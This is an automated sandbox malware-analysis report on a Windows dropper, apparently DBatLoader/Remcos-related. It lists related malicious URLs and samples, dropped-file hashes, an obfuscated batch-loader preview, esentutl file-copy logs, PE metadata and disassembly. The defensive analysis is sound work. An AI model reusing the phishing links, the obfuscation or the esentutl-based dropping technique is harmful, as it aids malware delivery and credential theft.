                                                                                                  https://addto.password.land/XTi9aSHpxMU9CSkxBVXRhNGJhTWRLelpoTjl5MHNEUndKbFN6WU9rV1E1QnF0azRVN1Z3OEFWTE0rd0NldXVBQ3QyUGw3NXpZcDNMMHZ3QklHeU5CYzJBSmowVWUzYlJtS1FOZlBKQzNHRkV5dDRZckdUSHVVZ1h3VGRxL2VNZkw3RDBlOS9rSTYvK3FOU2UwdUd2OFA0KzZWaWc4ZmMrMzhaTnBpSzc3aU55UVlxUnlKZXRwdm9nPS0td0ZVSjRCSTRJclFTRVBuVS0tc2h0a3RIa3J5VGJRUUt5NUZCdmxvdz09?cid=2310145655Get hashmaliciousKnowBe4Browse
                                                                                                  • 3.5.30.154
                                                                                                  https://accountsgoogle.me/cytech_developmentoperations-9d2f3a8e-7107-4b29-bc58-905af4e7e1c2/462/?id=16068&key=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6Im5hb3JyQHd0ZWEuY29tIiwiZXhwIjoxNzMxOTk2NzIzfQ.MoKjLaA6U4Hn3-TNwpA9VoBbllSNTwKl2--0wdNbn04/Get hashmaliciousUnknownBrowse
                                                                                                  • 52.217.102.92
                                                                                                  Recent Services Delays Update.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                  • 16.182.32.241
                                                                                                  ft.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 16.15.194.110
                                                                                                  https://temp.farenheit.net/XWU9WdXVLQ1BPcVcwN28vNmJmQW9rZy9JbGl2YjNqdU82UXRXbjVuRDE4WHZ2S3E3MTh0U0RLVVRZRjcvL3o0M1ZEZW5HMGQ2cUJ6Q1dmd0d6MzNsK1IwNkc0c1FQTlFkODFpdjI1RE5wTTZrZjNNL2ZlNTNzb3kvbXlTenlUOC94REZCNXJyYzEwcDduQ0JYM1JvQnpTTEhpdHIzWXlMVFh3dnJkNWo5N3JWODhWWVd4MWx5T0pqcUNZQlY3ZHRFTktEUGRLRVR4czR1dTMvY282WURmWGE0TkhiSkd2dkNZOUlGWUE9PS0tVVdmbHMzdlpZZDU2aFdnMy0teWdvSnFiVklFSk13UEoyUlNUQzd4Zz09?cid=2308276595Get hashmaliciousKnowBe4Browse
                                                                                                  • 52.217.126.49
                                                                                                  https://nam05.safelinks.protection.outlook.com.url.atp-redirect.protected-forms.com/XTnQrajg1OGVHZkdSZC9jY09NbW40Z2plNHVuWDhsQVZRZkFYNVBxOWlTekFXSXBLSVRWLyt2WXhuS1hGNVo3UUxGQTRLRVpXNHpLSjVKdDEvbHJLSmtFWjMzbFIxb3IvR2xvdWJ1em5yeTJBK1FXdzF3UG52YXBaVmJBSEJZcXBSdjFvMTh6TmplRHV4azZ6UHkrTnM5dUY2QmVzbVFVRWk5di9PMEZxZ2lXNnM5N2tuOExqN1pyUy0tcEx5Q0xXTTBEOURyNFdnTS0tTTJJM3JGT2w2ZzQxTnorb2NMd1lrZz09?cid=2305347406Get hashmaliciousKnowBe4Browse
                                                                                                  • 52.217.132.33
                                                                                                  https://bitbucket.org/ziphose/obmen/downloads/Doc.7zGet hashmaliciousRMSRemoteAdminBrowse
                                                                                                  • 3.5.30.93
                                                                                                  Recent Services Delays Update.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                  • 16.182.101.225

                                                                                                  ASNs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  RELIABLESITEUS8a984491558f624bf313baf8453d547c0f714822058a2aca540f64dc78e4078f.exeGet hashmaliciousAsyncRAT, PureLog Stealer, zgRATBrowse
                                                                                                  • 172.93.110.112
                                                                                                  https://trimmer.to:443/GWHMYGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 104.194.8.184
                                                                                                  ickTGSF56D.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 141.98.153.205
                                                                                                  Image_Product_Inquiry_Request_Villoslada.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                  • 185.150.191.117
                                                                                                  Payload 94.75 (2).225.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 172.93.106.189
                                                                                                  SecureMessageATT.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 104.194.8.184
                                                                                                  Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 104.243.33.38
                                                                                                  http://holidaybunch.comGet hashmaliciousUnknownBrowse
                                                                                                  • 104.194.8.184
                                                                                                  SecuriteInfo.com.BScope.Trojan.Agentb.20481.11202.msiGet hashmaliciousUnknownBrowse
                                                                                                  • 103.195.103.66
                                                                                                  Priority_Quote_Request_Items_List.exeGet hashmaliciousRemcosBrowse
                                                                                                  • 185.150.191.117
                                                                                                  AMAZON-02USyG53aU3gGm.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.50
                                                                                                  yG53aU3gGm.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.50
                                                                                                  QUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 13.228.81.39
                                                                                                  http://www.javatpoint.com.cach3.com/Get hashmaliciousUnknownBrowse
                                                                                                  • 52.76.92.93
                                                                                                  f3aef511705f37f9792c6032b936ca61.exeGet hashmaliciousNjratBrowse
                                                                                                  • 18.157.68.73
                                                                                                  https://skillbridge.ca/onlinePaymentverify.htmlGet hashmaliciousUnknownBrowse
                                                                                                  • 108.158.75.100
                                                                                                  purchase order.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 13.248.169.48
                                                                                                  main_mips.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 13.218.109.96
                                                                                                  https://fujipharma.box.com/s/pezxwn32zbr37fbrrrqh18g3y8eulbk2Get hashmaliciousUnknownBrowse
                                                                                                  • 52.77.73.5
                                                                                                  main_arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 108.143.162.104
                                                                                                  AMAZON-AESUSE8k9vfDETJ.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 54.210.155.1
                                                                                                  http://www.javatpoint.com.cach3.com/Get hashmaliciousUnknownBrowse
                                                                                                  • 3.233.144.220
                                                                                                  https://skillbridge.ca/onlinePaymentverify.htmlGet hashmaliciousUnknownBrowse
                                                                                                  • 44.219.182.139
                                                                                                  main_arm.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 52.206.131.86
                                                                                                  dtkB4s3lqj.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 34.237.241.83
                                                                                                  Payment Adv HSBC.htmlGet hashmaliciousUnknownBrowse
                                                                                                  • 34.227.125.234
                                                                                                  https://do.not.click.on.this.link.instantrevert.net/XSEg2WDlKd2JCRDJOMWtwUGE5L0dpYzEyZUF0UjVQWmNQaWl2Q21KaDZSeUhuKzhLc243eHpPN1h4NjVNTnAzblZ6ZFZhaGwydDB1ZHJNUnQ5S25RRk0yTEtDbkhEZUlDZ29KY3lveXU2YW9kWkxheHEvTm1wWU5tWjUvT0lGZHkvR3k2MXBCbkYxdmJkZWl2NnNHa1dFcTFVd29uTklraVNkNHdISUFEbCszRE9tc3RETjdZSXdsaWl3PT0tLWJIaFJQTDlXUWhZQ0V6eWMtLWtnaFdmOHAzRW9zTE12VmNnY2lDS2c9PQ==?cid=2314349904Get hashmaliciousKnowBe4Browse
                                                                                                  • 52.200.18.75
                                                                                                  https://docsend.com/view/nw5cttresp36nsvcGet hashmaliciousUnknownBrowse
                                                                                                  • 3.219.39.130
                                                                                                  FW_ _Reminder_ Membership Credit Verification - TPIS Industrial Services_ LLC.msgGet hashmaliciousUnknownBrowse
                                                                                                  • 18.213.11.84
                                                                                                  https://kitces.emlnk1.com/Get hashmaliciousUnknownBrowse
                                                                                                  • 34.237.253.202

                                                                                                  JA3 Fingerprints

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  a0e9f5d64349fb13191bc781f81f42e1yliGAnBiRb.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.50
                                                                                                  • 3.5.30.3
                                                                                                  extracted_payload.exe.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.50
                                                                                                  • 3.5.30.3
                                                                                                  YJ1Ia6bVqH.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.50
                                                                                                  • 3.5.30.3
                                                                                                  7Qn89l2e05.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.50
                                                                                                  • 3.5.30.3
                                                                                                  XA6KQrOcT2.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.50
                                                                                                  • 3.5.30.3
                                                                                                  cQr9VIHgFo.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.50
                                                                                                  • 3.5.30.3
                                                                                                  OdPdBlc1G0.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.50
                                                                                                  • 3.5.30.3
                                                                                                  Yon6wOFRoW.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.50
                                                                                                  • 3.5.30.3
                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                  • 185.166.143.50
                                                                                                  • 3.5.30.3
                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 185.166.143.50
                                                                                                  • 3.5.30.3

                                                                                                  Dropped Files

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  C:\Users\Public\alpha.pif1DDHIzYyor.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                    creatednew.htaGet hashmaliciousCobalt Strike, DBatLoader, HTMLPhisherBrowse
                                                                                                      Puyiaiob.PIF.bin.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                        saw.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                          A1 igazol#U00e1s.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                            kURjHPmRCx.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                                              EPTMAcgvNZ.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                AWkpqJMxci.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                  D2pQ4J4GGZ.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                    C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse

                                                                                                                      Created / dropped Files

                                                                                                                      C:\Users\Public\Dlaybpxl.url

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\jW3NEKvxH1.exe
                                                                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Dlaybpxl.PIF">), ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):104
                                                                                                                      Entropy (8bit):5.155774305505572
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMAydJTsbxcXycPwov:HRYFVmTWDyzMdJTExmycPwy
                                                                                                                      MD5:D0BCF22E099BB4B54C3700C5E31919AB
                                                                                                                      SHA1:60368C99A6E266AA1DA0B4962E6C531305CB7A86
                                                                                                                      SHA-256:09DF36D6A06DAC5581E168BBB67B33B69850C4D7AE3A992569A9FEA490D370FE
                                                                                                                      SHA-512:87D9F0DBF7441F060124C264BAB89A3474B9BBA02E4092A5DCD8A2CABB8A9D1A6D1F62E695B513A7A6784B48D3F43EF1C39F7AF3F03F9F1876DE0A0755C7BE9E
                                                                                                                      Malicious:true
                                                                                                                      Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Dlaybpxl.PIF"..IconIndex=946522..HotKey=89..

                                                                                                                      C:\Users\Public\Libraries\Dlaybpxl

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\jW3NEKvxH1.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):826217
                                                                                                                      Entropy (8bit):7.223436374494288
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:JIMRHxhpUrqZO1/r5p1iGOjvTZRZWq0VA0tSFhM0zhwPqgLvvXX:WMRR3Kq81/rXQljvTQquA0D01wxXX
                                                                                                                      MD5:D8DF974C1181F3091EC4F0467F16825A
                                                                                                                      SHA1:F41488DB793F8F91BBCB7784053D9C84AA781A78
                                                                                                                      SHA-256:D62B6AED4ED0205104E1196C4CDB0558EEFB3BE3EF74DC6891F7EBB3A562E9DA
                                                                                                                      SHA-512:0103575E38DF8D7435B51CBCDE00FCBF3978ADFE90B4A09874DD3B4BAAB7B4A40D0F29AEAC27367135700753CBB32C7C8BCAE14D6D75818376BDA7013E71F377
                                                                                                                      Malicious:true
                                                                                                                      Preview:bja..cm..........................................................................................................................bja..cm............bja..cm.'0..#*&.'32)...dhm...\2...CkH...[n47 q/.Y4.g9m....Re.8l.i......0..J..V..dLJ(-.|.m.\..n.3ni.]..f.-.L..-T....Z.(.Q.u.]..g..U/.+..S..........lR^=.].YL...Q../.C..o..;nHz....A/8...JFdc..f..@(...H...`J7(..1.:....hm]uol..`S...$..2...SbE...`[1/..2O.)%.?....$.,.._(..JU.....G.n.J...x...H.L.S.E.W.....>.C.@t.........^m(.Zp#+s..V.[.CDCS9.p..f.4l.`.B..Z$(.*..>/.*..N1.....#..I..mLsB..*.I...A]..c8....].B.7.N|i.IK.jY.. #..&....R...Fa..db-.#q0V.@!r:g..qj$.&)#.4K....ixZ*.m5..!+.&k...wkM13...nghv).b..z.-.3.m...0<xM..$P....+G#.W....f&1.[.m..p=3.X..vRaA.D.ma.X&.)j.]C..#...7YRz. T.AFA....+....toea..H&..e..T..>...`.R.,..".<u..8.N$WE.m.../.... ..F'.S+5,P..i/...?.>.N.'.1.'dS}m.?ES.\.J.q*.r)w.....a"X.wJe.>.MY3.I.].*.>...rI'y..'7..ehva.f'#".!..:$.'P .Q..<Z...'L.gO8Y?..["N...*...(&B'..F..nk.+$.#OOD];..13..../.\5]..E..##....c#,^ .%'..'!*

                                                                                                                      C:\Users\Public\Libraries\Dlaybpxl.PIF

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1285120
                                                                                                                      Entropy (8bit):6.607286301391161
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:Kg60JY2tAtZNMaMIcqRPl1Q9AXUY/jIU:Kg6PtM+tm9AXHjIU
                                                                                                                      MD5:E4696BE1368F7AC260C605C7B4F7EEAF
                                                                                                                      SHA1:D73A7226926B44F66D94FF7B229EF8243976EB6D
                                                                                                                      SHA-256:592624F30B177058EBA9B5B36E2E72BEA42AF95BF1552CA9A9CA28C4E1E6CFEB
                                                                                                                      SHA-512:F39677A025E865CF583899A0B5F10608F0C857DF5A3ABD79DBEBEA8FBD9F6BF31EC750B1143EE833594825512972EEC8D8D865E25DDE2AF3E8885CD7528F60F9
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................`...8......\w............@..........................0...................@...........................p...&...@..........................pr..................................................Hw...............................text....W.......X.................. ..`.itext.......p.......\.............. ..`.data...............d..............@....bss....$8...0...........................idata...&...p...(..................@....tls....4............:...................rdata...............:..............@..@.reloc..pr.......t...<..............@..B.rsrc........@......................@..@.............0......................@..@................................................................................................

                                                                                                                      C:\Users\Public\Libraries\PNO

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\jW3NEKvxH1.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):4
                                                                                                                      Entropy (8bit):2.0
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:vv:3
                                                                                                                      MD5:B0591B6427C74B9962AD7C1528ECEC4C
                                                                                                                      SHA1:A1A2485028183E103D1EE0EF384FA362C4CFE0B0
                                                                                                                      SHA-256:A8D5248315D1C52250334479AA0E6C5B3B56F708219BB48DA119A9F44D8CEDB8
                                                                                                                      SHA-512:0979BAE9F1D3EE69BC90005E77A8BDD6F187BE494DA3D069D66BDF91C21777C728D8047A6FFD1E3C6176E40866DC234FD2651C26CCC1343E0634BE135F01E996
                                                                                                                      Malicious:false
                                                                                                                      Preview:81..

                                                                                                                      C:\Users\Public\Libraries\lxpbyalD.cmd

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\jW3NEKvxH1.exe
                                                                                                                      File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):62357
                                                                                                                      Entropy (8bit):4.705712327109906
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                                                                      MD5:B87F096CBC25570329E2BB59FEE57580
                                                                                                                      SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                                                                      SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                                                                      SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                                                                      Malicious:true
                                                                                                                      Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .

                                                                                                                      C:\Users\Public\alpha.pif

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):236544
                                                                                                                      Entropy (8bit):6.4416694948877025
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                                                                      MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                                                                      SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                                                                      SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Joe Sandbox View:
                                                                                                                      • Filename: 1DDHIzYyor.exe, Detection: malicious, Browse
                                                                                                                      • Filename: creatednew.hta, Detection: malicious, Browse
                                                                                                                      • Filename: Puyiaiob.PIF.bin.exe, Detection: malicious, Browse
                                                                                                                      • Filename: saw.bat, Detection: malicious, Browse
                                                                                                                      • Filename: A1 igazol#U00e1s.cmd, Detection: malicious, Browse
                                                                                                                      • Filename: kURjHPmRCx.exe, Detection: malicious, Browse
                                                                                                                      • Filename: EPTMAcgvNZ.exe, Detection: malicious, Browse
                                                                                                                      • Filename: AWkpqJMxci.exe, Detection: malicious, Browse
                                                                                                                      • Filename: D2pQ4J4GGZ.exe, Detection: malicious, Browse
                                                                                                                      • Filename: C6dAUcOA6M.exe, Detection: malicious, Browse
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\Public\xpha.pif

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):18944
                                                                                                                      Entropy (8bit):5.742964649637377
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
                                                                                                                      MD5:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                      SHA1:FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
                                                                                                                      SHA-256:4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
                                                                                                                      SHA-512:C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z..................*...2......P4.......@....@..................................c....@...... ..........................`a..|....p.. ...............................T............................................`..\............................text....).......*.................. ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                      \Device\ConDrv

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):593
                                                                                                                      Entropy (8bit):4.673826245764139
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:q82XAxTzAeSbZ7u0wxDDDDDDDDjCaY50OaYAqilTB8NGNWz:bFxTzAp7u0wQak1asilt8Nlz
                                                                                                                      MD5:7063A9CACA6A15AD68C61592ED0AB4F0
                                                                                                                      SHA1:E161AADDD3BE045AD88912726E69223EE0E7EA76
                                                                                                                      SHA-256:1B9CF27DDF30006CAB866F3C9A459FA56C86946AA2DB3DC8E1E3BFB83114F64E
                                                                                                                      SHA-512:6A37E8C3084B1A77904C293009E24D9083B8BEDFE7BAFC98CAF3E1552798955056FD99726DC0C42AABA38AEC19CE3BC4B0F7852D5BE64AC6BE71C5349ABD8461
                                                                                                                      Malicious:false
                                                                                                                      Preview:..Initiating COPY FILE mode..... Source File: C:\Users\user\Desktop\jW3NEKvxH1.exe...Destination File: C:\\Users\\Public\\Libraries\\Dlaybpxl.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x139c00 (1285120) (1 MB)....Total bytes written = 0x13a000 (1286144) (1 MB).......Operation completed successfully in 0.219 seconds.....

                                                                                                                      \Device\Null

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):560
                                                                                                                      Entropy (8bit):4.532578488470501
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:q6p4xTXWIceSbZ7u0wxDDDDDDDDjCaY5B4aYA/4TB8NGNBG:/p4xT5cp7u0wQakB4aV4t8Nd
                                                                                                                      MD5:4D6C195EBA3736E57EF6A03F1EEEF490
                                                                                                                      SHA1:237210C613550627B46D6D6AB82F396EACA3EA20
                                                                                                                      SHA-256:FF89C20795C881958044CCE205E8EBAE0CC028631ED1E354BEF0AF0C5BD23E3C
                                                                                                                      SHA-512:2E4AC9CDB61DDEFDDEE6378C39282BABFCC457BB896D1B92E07E234BC202D0677FC20BD96FD0102A32B211DB5D47DDB1C8C0A396A481C9696E7CF0DF4959D3A1
                                                                                                                      Malicious:false
                                                                                                                      Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\ping.exe...Destination File: C:\\Users\\Public\\xpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x4a00 (18944) (0 MB)....Total bytes written = 0x5000 (20480) (0 MB).......Operation completed successfully in 0.62 seconds.....

                                                                                                                      Static File Info

                                                                                                                      General

                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Entropy (8bit):6.607286301391161
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.38%
                                                                                                                      • InstallShield setup (43055/19) 0.43%
                                                                                                                      • Windows Screen Saver (13104/52) 0.13%
                                                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      File name:jW3NEKvxH1.exe
                                                                                                                      File size:1'285'120 bytes
                                                                                                                      MD5:e4696be1368f7ac260c605c7b4f7eeaf
                                                                                                                      SHA1:d73a7226926b44f66d94ff7b229ef8243976eb6d
                                                                                                                      SHA256:592624f30b177058eba9b5b36e2e72bea42af95bf1552ca9a9ca28c4e1e6cfeb
                                                                                                                      SHA512:f39677a025e865cf583899a0b5f10608f0c857df5a3abd79dbebea8fbd9f6bf31ec750b1143ee833594825512972eec8d8d865e25dde2af3e8885cd7528f60f9
                                                                                                                      SSDEEP:24576:Kg60JY2tAtZNMaMIcqRPl1Q9AXUY/jIU:Kg6PtM+tm9AXHjIU
                                                                                                                      TLSH:8A559F4673B08633E4169D354BD6F79F5C2EFD303A20A8DE2BAA2D4CAD2D2D07765241
                                                                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                      File Icon

                                                                                                                      Icon Hash:19135dc5d4d4cc45

                                                                                                                      Static PE Info

                                                                                                                      General

                                                                                                                      Entrypoint:0x46775c
                                                                                                                      Entrypoint Section:.itext
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                      DLL Characteristics:
                                                                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:fd5b6f1de95e8d3bb65d74f763b0b320

                                                                                                                      Entrypoint Preview

                                                                                                                      Instruction
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      add esp, FFFFFFF0h
                                                                                                                      mov eax, 00466550h
                                                                                                                      call 00007FF3548A4B99h
                                                                                                                      mov eax, dword ptr [00472B38h]
                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                      call 00007FF3548F6ADDh
                                                                                                                      mov ecx, dword ptr [00472C98h]
                                                                                                                      mov eax, dword ptr [00472B38h]
                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                      mov edx, dword ptr [00465144h]
                                                                                                                      call 00007FF3548F6ADDh
                                                                                                                      mov eax, dword ptr [00472B38h]
                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                      call 00007FF3548F6B51h
                                                                                                                      call 00007FF3548A2BA4h
                                                                                                                      lea eax, dword ptr [eax+00h]
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
